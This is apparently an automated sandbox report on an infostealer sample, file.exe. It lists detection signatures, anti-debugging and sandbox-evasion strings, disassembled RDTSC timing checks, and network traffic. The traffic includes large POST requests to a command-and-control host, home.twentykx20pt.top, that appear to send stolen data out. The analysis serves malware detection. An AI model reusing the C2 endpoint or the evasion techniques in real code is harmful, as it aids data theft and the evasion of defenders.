Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1564519
MD5: 2ba6fe9428da32103bb44c955939208d
SHA1: 145b071306f5ad32a9385ff9f89bae6a1ec968e9
SHA256: 1d64908fcbd9560615576da2b9b41ce76fafb939a0f04f559301a1946db4e936
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: file.exe Avira: detected
Source: file.exe ReversingLabs: Detection: 31%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe Code function: -----BEGIN PUBLIC KEY----- 0_2_0055DCF0
Source: file.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [ebp+04h], 424D53FFh 0_2_0059A5B0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [edi+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [esi+04h], 424D53FFh 0_2_0059A7F0
Source: C:\Users\user\Desktop\file.exe Code function: mov dword ptr [ebx+04h], 424D53FFh 0_2_0059B560
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0053255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 0_2_0053255D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 0_2_005329FF
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: httpbin.org Accept: */*
Source: global traffic HTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1 Host: home.twentykx20pt.top Accept: */* Content-Type: application/json Content-Length: 557653
Source: global traffic HTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1 Host: home.twentykx20pt.top Accept: */* Content-Type: application/json Content-Length: 128 Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View IP Address: 18.213.123.165 18.213.123.165
Source: Joe Sandbox View IP Address: 34.118.84.150 34.118.84.150
Source: Joe Sandbox View ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005FA8C0 recvfrom, 0_2_005FA8C0
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.twentykx20pt.top
Source: unknown HTTP traffic detected: POST /AMeacCwtwXCqXfwTNSOI1732768477 HTTP/1.1 Host: home.twentykx20pt.top Accept: */* Content-Type: application/json Content-Length: 557653
Source: global traffic HTTP traffic detected: HTTP/1.1 404 NOT FOUND server: nginx/1.22.1 date: Thu, 28 Nov 2024 12:09:58 GMT content-type: text/html; charset=utf-8 content-length: 207 Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://.jpg
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477
Source: file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI17327684775a1
Source: file.exe, 00000000.00000003.2630054574.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2629897019.00000000016A3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2631723255.00000000016A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477?argument=
Source: file.exe, 00000000.00000002.2631723255.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477fd4
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://home.twentykx20pt.top/AMeacCwtwXCqXfwTNSOI1732768477http://home.twentykx20pt.top/AMeacCwtwXCq
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://html4/loose.dtd
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: file.exe, file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: file.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://httpbin.org/ip
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0054CCD0 appears 55 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005371E0 appears 47 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0070CBC0 appears 104 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0053CAA0 appears 64 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0054CD40 appears 80 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005750A0 appears 101 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005373F0 appears 111 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 006144A0 appears 76 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 005375A0 appears 696 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00574F40 appears 335 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 006E7220 appears 102 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00575340 appears 50 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00574FD0 appears 288 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0053C960 appears 37 times
Source: file.exe Static PE information: Section: dkqxmldn ZLIB complexity 0.9945288575306236
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: file.exe String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: file.exe Static file information: File size 4490752 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283a00
Source: file.exe Static PE information: Raw size of dkqxmldn is bigger than: 0x100000 < 0x1c1000

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.530000.0.unpack :EW;.rsrc:W;.idata :W; :EW;dkqxmldn:EW;ajwrokqy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;dkqxmldn:EW;ajwrokqy:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x44a3f0 should be: 0x44d94c
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: dkqxmldn
Source: file.exe Static PE information: section name: ajwrokqy
Source: file.exe Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DD258 push edx; ret 0_3_016DD259
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DB222 push ebp; iretd 0_3_016DB261
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016CDB14 push eax; retf 0_3_016CDB1D
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_016DF0AD push esi; ret 0_3_016DF0F2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0172E691 push edx; ret 0_3_0172E692
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01709D54 pushad ; iretd 0_3_01709D5F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B41D0 push eax; mov dword ptr [esp], edx 0_2_008B41D5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B2340 push eax; mov dword ptr [esp], 00000000h 0_2_005B2343
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005EC7F0 push eax; mov dword ptr [esp], 00000000h 0_2_005EC743
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00570AC0 push eax; mov dword ptr [esp], 00000000h 0_2_00570AC4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00591430 push eax; mov dword ptr [esp], 00000000h 0_2_00591433
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B39A0 push eax; mov dword ptr [esp], 00000000h 0_2_005B39A3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0058DAD0 push eax; mov dword ptr [esp], edx 0_2_0058DAD1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B9F40 push dword ptr [eax+04h]; ret 0_2_008B9F6F
Source: file.exe Static PE information: section name: dkqxmldn entropy: 7.95546200906979

Boot Survival

Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: PROCMON.EXE
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: X64DBG.EXE
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WINDBG.EXE
Source: file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: file.exe, 00000000.00000003.2033116158.000000000749F000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2630715713.0000000000A70000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9687B second address: D9687F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9809D second address: D980A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D980A1 second address: D980ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F70F070E5C8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 add dword ptr [ebp+124843FBh], edi 0x0000002c push 00000000h 0x0000002e jmp 00007F70F070E5D1h 0x00000033 xchg eax, ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D980ED second address: D980F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D980F3 second address: D980F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D980F7 second address: D98117 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F70F0BCDB15h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9C770 second address: D9C774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9B960 second address: D9B964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9D78A second address: D9D830 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F70F070E5CCh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F70F070E5C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F70F070E5C8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 movzx ebx, cx 0x00000049 push 00000000h 0x0000004b mov edi, dword ptr [ebp+122D1C19h] 0x00000051 mov ebx, 3D2AA4E7h 0x00000056 xchg eax, esi 0x00000057 js 00007F70F070E5D9h 0x0000005d push edi 0x0000005e jmp 00007F70F070E5D1h 0x00000063 pop edi 0x00000064 push eax 0x00000065 pushad 0x00000066 push esi 0x00000067 push edi 0x00000068 pop edi 0x00000069 pop esi 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F70F070E5D0h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9DA11 second address: D9DA2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F0BCDB17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9E920 second address: D9E98E instructions: 0x00000000 rdtsc 0x00000002 je 00007F70F070E5C8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub ebx, 23179EF6h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c jng 00007F70F070E5CBh 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov di, A832h 0x0000002d mov eax, dword ptr [ebp+122D0439h] 0x00000033 mov ebx, 0023935Ah 0x00000038 push FFFFFFFFh 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007F70F070E5C8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jbe 00007F70F070E5C6h 0x0000005e push ecx 0x0000005f pop ecx 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9DA2C second address: D9DA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA075D second address: DA076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F95B second address: D9F9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F70F0BCDB08h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov ebx, dword ptr [ebp+122D2CB9h] 0x00000029 mov ebx, esi 0x0000002b push dword ptr fs:[00000000h] 0x00000032 pushad 0x00000033 mov dword ptr [ebp+1244DC56h], ebx 0x00000039 popad 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F70F0BCDB08h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 00000015h 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b mov eax, dword ptr [ebp+122D160Dh] 0x00000061 pushad 0x00000062 movzx eax, si 0x00000065 mov edx, ecx 0x00000067 popad 0x00000068 push FFFFFFFFh 0x0000006a sub dword ptr [ebp+122D307Eh], ecx 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F9E0 second address: D9F9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F9E4 second address: D9F9E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F9E8 second address: D9F9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D9F9EE second address: D9F9F8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F70F0BCDB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA167C second address: DA1685 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA1685 second address: DA168B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA168B second address: DA1697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA1697 second address: DA169B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D43E5C second address: D43E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F70F070E5D3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA18E4 second address: DA18EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3E68 second address: DA3E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3E6C second address: DA3EB1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F70F0BCDB08h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov edi, 6A9E777Ah 0x00000027 push 00000000h 0x00000029 mov bl, al 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D311Eh], ecx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jno 00007F70F0BCDB0Ch 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3EB1 second address: DA3EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3EB7 second address: DA3EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3EBB second address: DA3EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3FC4 second address: DA3FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F70F0BCDB0Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3FD5 second address: DA4071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F70F070E5D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e movsx edi, bx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov bx, 1B47h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007F70F070E5C8h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 00000014h 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d xor edi, dword ptr [ebp+122D5837h] 0x00000043 mov eax, dword ptr [ebp+122D0B0Dh] 0x00000049 push 00000000h 0x0000004b push edi 0x0000004c call 00007F70F070E5C8h 0x00000051 pop edi 0x00000052 mov dword ptr [esp+04h], edi 0x00000056 add dword ptr [esp+04h], 00000016h 0x0000005e inc edi 0x0000005f push edi 0x00000060 ret 0x00000061 pop edi 0x00000062 ret 0x00000063 sub ebx, dword ptr [ebp+122D2D49h] 0x00000069 pushad 